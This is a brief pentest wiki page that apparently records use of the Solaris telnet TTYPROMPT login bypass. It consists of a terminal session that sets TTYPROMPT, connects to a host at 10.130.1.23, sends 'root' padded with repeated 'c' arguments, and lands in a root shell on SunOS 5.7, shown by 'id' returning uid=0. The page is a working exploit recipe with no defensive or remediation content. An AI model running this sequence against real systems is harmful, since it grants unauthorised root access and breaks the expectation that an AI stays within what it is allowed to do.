Sysadmin > SecurityAndPentests > SolarisTelnetExploit

Solaris telnet exploit

~# telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 10.130.1.23
Trying 10.130.1.23...
Connected to 10.130.1.23.
Escape character is '^]'.


SunOS 5.7

root c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Mon Aug  1 09:36:04 from 10.135.34.56
Sun Microsystems Inc.   SunOS 5.7       Generic October 1998
root@uiiclac1:/>id
uid=0(root) gid=1(other)
root@uiiclac1:/>date
Tue Sep 27 15:07:37 MET DST 2011
root@uiiclac1:/>exit
Connection closed by foreign host.